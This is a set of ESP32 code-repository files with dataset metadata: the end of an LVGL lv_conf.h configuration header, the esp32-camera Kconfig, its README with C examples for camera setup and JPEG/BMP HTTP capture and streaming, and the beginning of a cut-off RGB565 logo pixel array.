#define LV_THEME_DEFAULT_COLOR_SECONDARY lv_color_hex(0x44d1b6)
#define LV_THEME_DEFAULT_FLAG LV_THEME_MATERIAL_FLAG_LIGHT
#define LV_THEME_DEFAULT_FONT_SMALL &lv_font_montserrat_14
#define LV_THEME_DEFAULT_FONT_NORMAL &lv_font_montserrat_14
#define LV_THEME_DEFAULT_FONT_SUBTITLE &lv_font_montserrat_14
#define LV_THEME_DEFAULT_FONT_TITLE &lv_font_montserrat_14
/*=================
* Text settings
*=================*/
/* Select a character encoding for strings.
* Your IDE or editor should have the same character encoding
* - LV_TXT_ENC_UTF8
* - LV_TXT_ENC_ASCII
* */
#define LV_TXT_ENC LV_TXT_ENC_UTF8
/*Can break (wrap) texts on these chars*/
#define LV_TXT_BREAK_CHARS " ,.;:-_"
/* If a word is at least this long, will break wherever "prettiest"
* To disable, set to a value <= 0 */
#define LV_TXT_LINE_BREAK_LONG_LEN 0
/* Minimum number of characters in a long word to put on a line before a break.
* Depends on LV_TXT_LINE_BREAK_LONG_LEN. */
#define LV_TXT_LINE_BREAK_LONG_PRE_MIN_LEN 3
/* Minimum number of characters in a long word to put on a line after a break.
* Depends on LV_TXT_LINE_BREAK_LONG_LEN. */
#define LV_TXT_LINE_BREAK_LONG_POST_MIN_LEN 3
/* The control character to use for signalling text recoloring. */
#define LV_TXT_COLOR_CMD "#"
/* Support bidirectional texts.
* Allows mixing Left-to-Right and Right-to-Left texts.
* The direction will be processed according to the Unicode Bidirectioanl Algorithm:
* https://www.w3.org/International/articles/inline-bidi-markup/uba-basics*/
#define LV_USE_BIDI 0
#if LV_USE_BIDI
/* Set the default direction. Supported values:
* `LV_BIDI_DIR_LTR` Left-to-Right
* `LV_BIDI_DIR_RTL` Right-to-Left
* `LV_BIDI_DIR_AUTO` detect texts base direction */
#define LV_BIDI_BASE_DIR_DEF LV_BIDI_DIR_AUTO
#endif
/* Enable Arabic/Persian processing
* In these languages characters should be replaced with
* an other form based on their position in the text */
#define LV_USE_ARABIC_PERSIAN_CHARS 0
/*Change the built in (v)snprintf functions*/
#define LV_SPRINTF_CUSTOM 0
#if LV_SPRINTF_CUSTOM
# define LV_SPRINTF_INCLUDE <stdio.h>
# define lv_snprintf snprintf
# define lv_vsnprintf vsnprintf
#else /*!LV_SPRINTF_CUSTOM*/
# define LV_SPRINTF_DISABLE_FLOAT 1
#endif /*LV_SPRINTF_CUSTOM*/
/*===================
* LV_OBJ SETTINGS
*==================*/
#if LV_USE_USER_DATA
/*Declare the type of the user data of object (can be e.g. `void *`, `int`, `struct`)*/
typedef void * lv_obj_user_data_t;
/*Provide a function to free user data*/
#define LV_USE_USER_DATA_FREE 0
#if LV_USE_USER_DATA_FREE
# define LV_USER_DATA_FREE_INCLUDE "something.h" /*Header for user data free function*/
/* Function prototype : void user_data_free(lv_obj_t * obj); */
# define LV_USER_DATA_FREE (user_data_free) /*Invoking for user data free function*/
#endif
#endif
/*1: enable `lv_obj_realign()` based on `lv_obj_align()` parameters*/
#define LV_USE_OBJ_REALIGN 1
/* Enable to make the object clickable on a larger area.
* LV_EXT_CLICK_AREA_OFF or 0: Disable this feature
* LV_EXT_CLICK_AREA_TINY: The extra area can be adjusted horizontally and vertically (0..255 px)
* LV_EXT_CLICK_AREA_FULL: The extra area can be adjusted in all 4 directions (-32k..+32k px)
*/
#define LV_USE_EXT_CLICK_AREA LV_EXT_CLICK_AREA_TINY
/*==================
* LV OBJ X USAGE
*================*/
/*
* Documentation of the object types: https://docs.lvgl.com/#Object-types
*/
/*Arc (dependencies: -)*/
#define LV_USE_ARC 1
/*Bar (dependencies: -)*/
#define LV_USE_BAR 1
/*Button (dependencies: lv_cont*/
#define LV_USE_BTN 1
/*Button matrix (dependencies: -)*/
#define LV_USE_BTNMATRIX 1
/*Calendar (dependencies: -)*/
#define LV_USE_CALENDAR 1
#if LV_USE_CALENDAR
# define LV_CALENDAR_WEEK_STARTS_MONDAY 0
#endif
/*Canvas (dependencies: lv_img)*/
#define LV_USE_CANVAS 1
/*Check box (dependencies: lv_btn, lv_label)*/
#define LV_USE_CHECKBOX 1
/*Chart (dependencies: -)*/
#define LV_USE_CHART 1
#if LV_USE_CHART
# define LV_CHART_AXIS_TICK_LABEL_MAX_LEN 256
#endif
/*Container (dependencies: -*/
#define LV_USE_CONT 1
/*Color picker (dependencies: -*/
#define LV_USE_CPICKER 1
/*Drop down list (dependencies: lv_page, lv_label, lv_symbol_def.h)*/
#define LV_USE_DROPDOWN 1
#if LV_USE_DROPDOWN != 0
/*Open and close default animation time [ms] (0: no animation)*/
# define LV_DROPDOWN_DEF_ANIM_TIME 200
#endif
/*Gauge (dependencies:lv_bar, lv_linemeter)*/
#define LV_USE_GAUGE 1
/*Image (dependencies: lv_label*/
#define LV_USE_IMG 1
/*Image Button (dependencies: lv_btn*/
#define LV_USE_IMGBTN 1
#if LV_USE_IMGBTN
/*1: The imgbtn requires left, mid and right parts and the width can be set freely*/
# define LV_IMGBTN_TILED 0
#endif
/*Keyboard (dependencies: lv_btnm)*/
#define LV_USE_KEYBOARD 1
/*Label (dependencies: -*/
#define LV_USE_LABEL 1
#if LV_USE_LABEL != 0
/*Hor, or ver. scroll speed [px/sec] in 'LV_LABEL_LONG_ROLL/ROLL_CIRC' mode*/
# define LV_LABEL_DEF_SCROLL_SPEED 25
/* Waiting period at beginning/end of animation cycle */
# define LV_LABEL_WAIT_CHAR_COUNT 3
/*Enable selecting text of the label */
# define LV_LABEL_TEXT_SEL 0
/*Store extra some info in labels (12 bytes) to speed up drawing of very long texts*/
# define LV_LABEL_LONG_TXT_HINT 0
#endif
/*LED (dependencies: -)*/
#define LV_USE_LED 1
#if LV_USE_LED
# define LV_LED_BRIGHT_MIN 120 /*Minimal brightness*/
# define LV_LED_BRIGHT_MAX 255 /*Maximal brightness*/
#endif
/*Line (dependencies: -*/
#define LV_USE_LINE 1
/*List (dependencies: lv_page, lv_btn, lv_label, (lv_img optionally for icons ))*/
#define LV_USE_LIST 1
#if LV_USE_LIST != 0
/*Default animation time of focusing to a list element [ms] (0: no animation) */
# define LV_LIST_DEF_ANIM_TIME 100
#endif
/*Line meter (dependencies: *;)*/
#define LV_USE_LINEMETER 1
#if LV_USE_LINEMETER
/* Draw line more precisely at cost of performance.
* Useful if there are lot of lines any minor are visible
* 0: No extra precision
* 1: Some extra precision
* 2: Best precision
*/
# define LV_LINEMETER_PRECISE 0
#endif
/*Mask (dependencies: -)*/
#define LV_USE_OBJMASK 1
/*Message box (dependencies: lv_rect, lv_btnm, lv_label)*/
#define LV_USE_MSGBOX 1
/*Page (dependencies: lv_cont)*/
#define LV_USE_PAGE 1
#if LV_USE_PAGE != 0
/*Focus default animation time [ms] (0: no animation)*/
# define LV_PAGE_DEF_ANIM_TIME 400
#endif
/*Preload (dependencies: lv_arc, lv_anim)*/
#define LV_USE_SPINNER 1
#if LV_USE_SPINNER != 0
# define LV_SPINNER_DEF_ARC_LENGTH 60 /*[deg]*/
# define LV_SPINNER_DEF_SPIN_TIME 1000 /*[ms]*/
# define LV_SPINNER_DEF_ANIM LV_SPINNER_TYPE_SPINNING_ARC
#endif
/*Roller (dependencies: lv_ddlist)*/
#define LV_USE_ROLLER 1
#if LV_USE_ROLLER != 0
/*Focus animation time [ms] (0: no animation)*/
# define LV_ROLLER_DEF_ANIM_TIME 200
/*Number of extra "pages" when the roller is infinite*/
# define LV_ROLLER_INF_PAGES 7
#endif
/*Slider (dependencies: lv_bar)*/
#define LV_USE_SLIDER 1
/*Spinbox (dependencies: lv_ta)*/
#define LV_USE_SPINBOX 1
/*Switch (dependencies: lv_slider)*/
#define LV_USE_SWITCH 1
/*Text area (dependencies: lv_label, lv_page)*/
#define LV_USE_TEXTAREA 1
#if LV_USE_TEXTAREA != 0
# define LV_TEXTAREA_DEF_CURSOR_BLINK_TIME 400 /*ms*/
# define LV_TEXTAREA_DEF_PWD_SHOW_TIME 1500 /*ms*/
#endif
/*Table (dependencies: lv_label)*/
#define LV_USE_TABLE 1
#if LV_USE_TABLE
# define LV_TABLE_COL_MAX 12
#endif
/*Tab (dependencies: lv_page, lv_btnm)*/
#define LV_USE_TABVIEW 1
# if LV_USE_TABVIEW != 0
/*Time of slide animation [ms] (0: no animation)*/
# define LV_TABVIEW_DEF_ANIM_TIME 300
#endif
/*Tileview (dependencies: lv_page) */
#define LV_USE_TILEVIEW 1
#if LV_USE_TILEVIEW
/*Time of slide animation [ms] (0: no animation)*/
# define LV_TILEVIEW_DEF_ANIM_TIME 300
#endif
/*Window (dependencies: lv_cont, lv_btn, lv_label, lv_img, lv_page)*/
#define LV_USE_WIN 1
/*==================
* Non-user section
*==================*/
#if defined(_MSC_VER) && !defined(_CRT_SECURE_NO_WARNINGS) /* Disable warnings for Visual Studio*/
# define _CRT_SECURE_NO_WARNINGS
#endif
/*--END OF LV_CONF_H--*/
#endif /*LV_CONF_H*/
#endif /*End of "Content enable"*/
| 24,392 | lv_conf | h | en | c | code | {"qsc_code_num_words": 3807, "qsc_code_num_chars": 24392.0, "qsc_code_mean_word_length": 4.28500131, "qsc_code_frac_words_unique": 0.22668768, "qsc_code_frac_chars_top_2grams": 0.09562925, "qsc_code_frac_chars_top_3grams": 0.045853, "qsc_code_frac_chars_top_4grams": 0.01029853, "qsc_code_frac_chars_dupe_5grams": 0.21418501, "qsc_code_frac_chars_dupe_6grams": 0.12106909, "qsc_code_frac_chars_dupe_7grams": 0.07834243, "qsc_code_frac_chars_dupe_8grams": 0.07429657, "qsc_code_frac_chars_dupe_9grams": 0.06326243, "qsc_code_frac_chars_dupe_10grams": 0.05038926, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02080409, "qsc_code_frac_chars_whitespace": 0.18219088, "qsc_code_size_file_byte": 24392.0, "qsc_code_num_lines": 742.0, "qsc_code_num_chars_line_max": 133.0, "qsc_code_num_chars_line_mean": 32.87331536, "qsc_code_frac_chars_alphabet": 0.79697213, "qsc_code_frac_chars_comments": 0.63217448, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.12546125, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00479269, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00178333, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.02214022, "qsc_codec_frac_lines_func_ratio": 0.01476015, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.02214022, "qsc_codec_frac_lines_print": 0.00738007, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/esp32-camera/Kconfig | menu "Camera configuration"
config OV2640_SUPPORT
bool "OV2640 Support"
default y
help
Enable this option if you want to use the OV2640.
Disable this option to save memory.
config OV7725_SUPPORT
bool "OV7725 Support"
default n
help
Enable this option if you want to use the OV7725.
Disable this option to save memory.
config OV3660_SUPPORT
bool "OV3660 Support"
default y
help
Enable this option if you want to use the OV3360.
Disable this option to save memory.
config OV5640_SUPPORT
bool "OV5640 Support"
default y
help
Enable this option if you want to use the OV5640.
Disable this option to save memory.
config SCCB_HARDWARE_I2C
bool "Use hardware I2C for SCCB"
default y
help
Enable this option if you want to use hardware I2C to control the camera.
Disable this option to use software I2C.
choice SCCB_HARDWARE_I2C_PORT
bool "I2C peripheral to use for SCCB"
depends on SCCB_HARDWARE_I2C
default SCCB_HARDWARE_I2C_PORT1
config SCCB_HARDWARE_I2C_PORT0
bool "I2C0"
config SCCB_HARDWARE_I2C_PORT1
bool "I2C1"
endchoice
choice CAMERA_TASK_PINNED_TO_CORE
bool "Camera task pinned to core"
default CAMERA_CORE0
help
Pin the camera handle task to a certain core(0/1). It can also be done automatically choosing NO_AFFINITY.
config CAMERA_CORE0
bool "CORE0"
config CAMERA_CORE1
bool "CORE1"
config CAMERA_NO_AFFINITY
bool "NO_AFFINITY"
endchoice
endmenu
| 1,576 | Kconfig | en | unknown | unknown | {} | 0 | {} | |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/esp32-camera/README.md | # ESP32 Camera Driver
## General Information
This repository hosts ESP32 compatible driver for OV2640, OV3660, OV5640 and OV7725 image sensors. Additionally it provides a few tools, which allow converting the captured frame data to the more common BMP and JPEG formats.
## Important to Remember
- Except when using CIF or lower resolution with JPEG, the driver requires PSRAM to be installed and activated.
- Using YUV or RGB puts a lot of strain on the chip because writing to PSRAM is not particularly fast. The result is that image data might be missing. This is particularly true if WiFi is enabled. If you need RGB data, it is recommended that JPEG is captured and then turned into RGB using `fmt2rgb888` or `fmt2bmp`/`frame2bmp`.
- When 1 frame buffer is used, the driver will wait for the current frame to finish (VSYNC) and start I2S DMA. After the frame is acquired, I2S will be stopped and the frame buffer returned to the application. This approach gives more control over the system, but results in longer time to get the frame.
- When 2 or more frame bufers are used, I2S is running in continuous mode and each frame is pushed to a queue that the application can access. This approach puts more strain on the CPU/Memory, but allows for double the frame rate. Please use only with JPEG.
## Installation Instructions
### Using esp-idf
- Clone or download and extract the repository to the components folder of your ESP-IDF project
- Enable PSRAM in `menuconfig`
- Include `esp_camera.h` in your code
### Using PlatformIO
On the `env` section of `platformio.ini`, add the following:
```ini
[env]
lib_deps =
esp32-camera
```
Now the `esp_camera.h` is available to be included:
```c
#include "esp_camera.h"
```
Enable PSRAM on `menuconfig` or type it direclty on `sdkconfig`. Check the [official doc](https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-reference/kconfig.html#config-esp32-spiram-support) for more info.
```
CONFIG_ESP32_SPIRAM_SUPPORT=y
```
**Make sure to append** [this `Kconfig`](./Kconfig) content into the `Kconfig` of your project. Then, choose the configurations according to your setup.
### Kconfig options
| config | description | default |
| --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------ |
| CONFIG_OV2640_SUPPORT | Support for OV2640 camera | enabled |
| CONFIG_OV7725_SUPPORT | Support for OV7725 camera | disabled |
| CONFIG_OV3660_SUPPORT | Support for OV3660 camera | enabled |
| CONFIG_OV5640_SUPPORT | Support for OV5640 camera | enabled |
| CONFIG_SCCB_HARDWARE_I2C | Enable this option if you want to use hardware I2C to control the camera. Disable this option to use software I2C. | enabled |
| CONFIG_SCCB_HARDWARE_I2C_PORT | I2C peripheral to use for SCCB. Can be I2C0 and I2C1. | CONFIG_SCCB_HARDWARE_I2C_PORT1 |
| CONFIG_CAMERA_TASK_PINNED_TO_CORE | Pin the camera handle task to a certain core(0/1). It can also be done automatically choosing NO_AFFINITY. Can be CAMERA_CORE0, CAMERA_CORE1 or NO_AFFINITY. | CONFIG_CAMERA_CORE0 |
## Examples
### Initialization
```c
#include "esp_camera.h"
//WROVER-KIT PIN Map
#define CAM_PIN_PWDN -1 //power down is not used
#define CAM_PIN_RESET -1 //software reset will be performed
#define CAM_PIN_XCLK 21
#define CAM_PIN_SIOD 26
#define CAM_PIN_SIOC 27
#define CAM_PIN_D7 35
#define CAM_PIN_D6 34
#define CAM_PIN_D5 39
#define CAM_PIN_D4 36
#define CAM_PIN_D3 19
#define CAM_PIN_D2 18
#define CAM_PIN_D1 5
#define CAM_PIN_D0 4
#define CAM_PIN_VSYNC 25
#define CAM_PIN_HREF 23
#define CAM_PIN_PCLK 22
static camera_config_t camera_config = {
.pin_pwdn = CAM_PIN_PWDN,
.pin_reset = CAM_PIN_RESET,
.pin_xclk = CAM_PIN_XCLK,
.pin_sscb_sda = CAM_PIN_SIOD,
.pin_sscb_scl = CAM_PIN_SIOC,
.pin_d7 = CAM_PIN_D7,
.pin_d6 = CAM_PIN_D6,
.pin_d5 = CAM_PIN_D5,
.pin_d4 = CAM_PIN_D4,
.pin_d3 = CAM_PIN_D3,
.pin_d2 = CAM_PIN_D2,
.pin_d1 = CAM_PIN_D1,
.pin_d0 = CAM_PIN_D0,
.pin_vsync = CAM_PIN_VSYNC,
.pin_href = CAM_PIN_HREF,
.pin_pclk = CAM_PIN_PCLK,
//XCLK 20MHz or 10MHz for OV2640 double FPS (Experimental)
.xclk_freq_hz = 20000000,
.ledc_timer = LEDC_TIMER_0,
.ledc_channel = LEDC_CHANNEL_0,
.pixel_format = PIXFORMAT_JPEG,//YUV422,GRAYSCALE,RGB565,JPEG
.frame_size = FRAMESIZE_UXGA,//QQVGA-QXGA Do not use sizes above QVGA when not JPEG
.jpeg_quality = 12, //0-63 lower number means higher quality
.fb_count = 1 //if more than one, i2s runs in continuous mode. Use only with JPEG
};
esp_err_t camera_init(){
//power up the camera if PWDN pin is defined
if(CAM_PIN_PWDN != -1){
pinMode(CAM_PIN_PWDN, OUTPUT);
digitalWrite(CAM_PIN_PWDN, LOW);
}
//initialize the camera
esp_err_t err = esp_camera_init(&camera_config);
if (err != ESP_OK) {
ESP_LOGE(TAG, "Camera Init Failed");
return err;
}
return ESP_OK;
}
esp_err_t camera_capture(){
//acquire a frame
camera_fb_t * fb = esp_camera_fb_get();
if (!fb) {
ESP_LOGE(TAG, "Camera Capture Failed");
return ESP_FAIL;
}
//replace this with your own function
process_image(fb->width, fb->height, fb->format, fb->buf, fb->len);
//return the frame buffer back to the driver for reuse
esp_camera_fb_return(fb);
return ESP_OK;
}
```
### JPEG HTTP Capture
```c
#include "esp_camera.h"
#include "esp_http_server.h"
#include "esp_timer.h"
typedef struct {
httpd_req_t *req;
size_t len;
} jpg_chunking_t;
static size_t jpg_encode_stream(void * arg, size_t index, const void* data, size_t len){
jpg_chunking_t *j = (jpg_chunking_t *)arg;
if(!index){
j->len = 0;
}
if(httpd_resp_send_chunk(j->req, (const char *)data, len) != ESP_OK){
return 0;
}
j->len += len;
return len;
}
esp_err_t jpg_httpd_handler(httpd_req_t *req){
camera_fb_t * fb = NULL;
esp_err_t res = ESP_OK;
size_t fb_len = 0;
int64_t fr_start = esp_timer_get_time();
fb = esp_camera_fb_get();
if (!fb) {
ESP_LOGE(TAG, "Camera capture failed");
httpd_resp_send_500(req);
return ESP_FAIL;
}
res = httpd_resp_set_type(req, "image/jpeg");
if(res == ESP_OK){
res = httpd_resp_set_hdr(req, "Content-Disposition", "inline; filename=capture.jpg");
}
if(res == ESP_OK){
if(fb->format == PIXFORMAT_JPEG){
fb_len = fb->len;
res = httpd_resp_send(req, (const char *)fb->buf, fb->len);
} else {
jpg_chunking_t jchunk = {req, 0};
res = frame2jpg_cb(fb, 80, jpg_encode_stream, &jchunk)?ESP_OK:ESP_FAIL;
httpd_resp_send_chunk(req, NULL, 0);
fb_len = jchunk.len;
}
}
esp_camera_fb_return(fb);
int64_t fr_end = esp_timer_get_time();
ESP_LOGI(TAG, "JPG: %uKB %ums", (uint32_t)(fb_len/1024), (uint32_t)((fr_end - fr_start)/1000));
return res;
}
```
### JPEG HTTP Stream
```c
#include "esp_camera.h"
#include "esp_http_server.h"
#include "esp_timer.h"
#define PART_BOUNDARY "123456789000000000000987654321"
static const char* _STREAM_CONTENT_TYPE = "multipart/x-mixed-replace;boundary=" PART_BOUNDARY;
static const char* _STREAM_BOUNDARY = "\r\n--" PART_BOUNDARY "\r\n";
static const char* _STREAM_PART = "Content-Type: image/jpeg\r\nContent-Length: %u\r\n\r\n";
esp_err_t jpg_stream_httpd_handler(httpd_req_t *req){
camera_fb_t * fb = NULL;
esp_err_t res = ESP_OK;
size_t _jpg_buf_len;
uint8_t * _jpg_buf;
char * part_buf[64];
static int64_t last_frame = 0;
if(!last_frame) {
last_frame = esp_timer_get_time();
}
res = httpd_resp_set_type(req, _STREAM_CONTENT_TYPE);
if(res != ESP_OK){
return res;
}
while(true){
fb = esp_camera_fb_get();
if (!fb) {
ESP_LOGE(TAG, "Camera capture failed");
res = ESP_FAIL;
break;
}
if(fb->format != PIXFORMAT_JPEG){
bool jpeg_converted = frame2jpg(fb, 80, &_jpg_buf, &_jpg_buf_len);
if(!jpeg_converted){
ESP_LOGE(TAG, "JPEG compression failed");
esp_camera_fb_return(fb);
res = ESP_FAIL;
}
} else {
_jpg_buf_len = fb->len;
_jpg_buf = fb->buf;
}
if(res == ESP_OK){
res = httpd_resp_send_chunk(req, _STREAM_BOUNDARY, strlen(_STREAM_BOUNDARY));
}
if(res == ESP_OK){
size_t hlen = snprintf((char *)part_buf, 64, _STREAM_PART, _jpg_buf_len);
res = httpd_resp_send_chunk(req, (const char *)part_buf, hlen);
}
if(res == ESP_OK){
res = httpd_resp_send_chunk(req, (const char *)_jpg_buf, _jpg_buf_len);
}
if(fb->format != PIXFORMAT_JPEG){
free(_jpg_buf);
}
esp_camera_fb_return(fb);
if(res != ESP_OK){
break;
}
int64_t fr_end = esp_timer_get_time();
int64_t frame_time = fr_end - last_frame;
last_frame = fr_end;
frame_time /= 1000;
ESP_LOGI(TAG, "MJPG: %uKB %ums (%.1ffps)",
(uint32_t)(_jpg_buf_len/1024),
(uint32_t)frame_time, 1000.0 / (uint32_t)frame_time);
}
last_frame = 0;
return res;
}
```
### BMP HTTP Capture
```c
#include "esp_camera.h"
#include "esp_http_server.h"
#include "esp_timer.h"
esp_err_t bmp_httpd_handler(httpd_req_t *req){
camera_fb_t * fb = NULL;
esp_err_t res = ESP_OK;
int64_t fr_start = esp_timer_get_time();
fb = esp_camera_fb_get();
if (!fb) {
ESP_LOGE(TAG, "Camera capture failed");
httpd_resp_send_500(req);
return ESP_FAIL;
}
uint8_t * buf = NULL;
size_t buf_len = 0;
bool converted = frame2bmp(fb, &buf, &buf_len);
esp_camera_fb_return(fb);
if(!converted){
ESP_LOGE(TAG, "BMP conversion failed");
httpd_resp_send_500(req);
return ESP_FAIL;
}
res = httpd_resp_set_type(req, "image/x-windows-bmp")
|| httpd_resp_set_hdr(req, "Content-Disposition", "inline; filename=capture.bmp")
|| httpd_resp_send(req, (const char *)buf, buf_len);
free(buf);
int64_t fr_end = esp_timer_get_time();
ESP_LOGI(TAG, "BMP: %uKB %ums", (uint32_t)(buf_len/1024), (uint32_t)((fr_end - fr_start)/1000));
return res;
}
```
| 11,662 | README | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.00565941, "qsc_doc_frac_words_redpajama_stop": 0.13168517, "qsc_doc_num_sentences": 88.0, "qsc_doc_num_words": 1580, "qsc_doc_num_chars": 11662.0, "qsc_doc_num_lines": 327.0, "qsc_doc_mean_word_length": 4.09240506, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.24873418, "qsc_doc_entropy_unigram": 5.17539826, "qsc_doc_frac_words_all_caps": 0.09081736, "qsc_doc_frac_lines_dupe_lines": 0.39405204, "qsc_doc_frac_chars_dupe_lines": 0.1454368, "qsc_doc_frac_chars_top_2grams": 0.03247758, "qsc_doc_frac_chars_top_3grams": 0.02969378, "qsc_doc_frac_chars_top_4grams": 0.01082586, "qsc_doc_frac_chars_dupe_5grams": 0.25564491, "qsc_doc_frac_chars_dupe_6grams": 0.21543458, "qsc_doc_frac_chars_dupe_7grams": 0.18249304, "qsc_doc_frac_chars_dupe_8grams": 0.18048252, "qsc_doc_frac_chars_dupe_9grams": 0.16996598, "qsc_doc_frac_chars_dupe_10grams": 0.16996598, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 1.0, "qsc_doc_num_chars_sentence_length_mean": 27.10361446, "qsc_doc_frac_chars_hyperlink_html_tag": 0.00994684, "qsc_doc_frac_chars_alphabet": 0.75301719, "qsc_doc_frac_chars_digital": 0.03523101, "qsc_doc_frac_chars_whitespace": 0.29660436, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/test/image.h | /**
* Suggested tool for generating images : http://code.google.com/p/lcd-image-converter,
* The below images are 16bit 565RGB colors, using "const" to save RAM and store images in flash memory
**/
const uint16_t esp_logo[137 * 26] = {
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 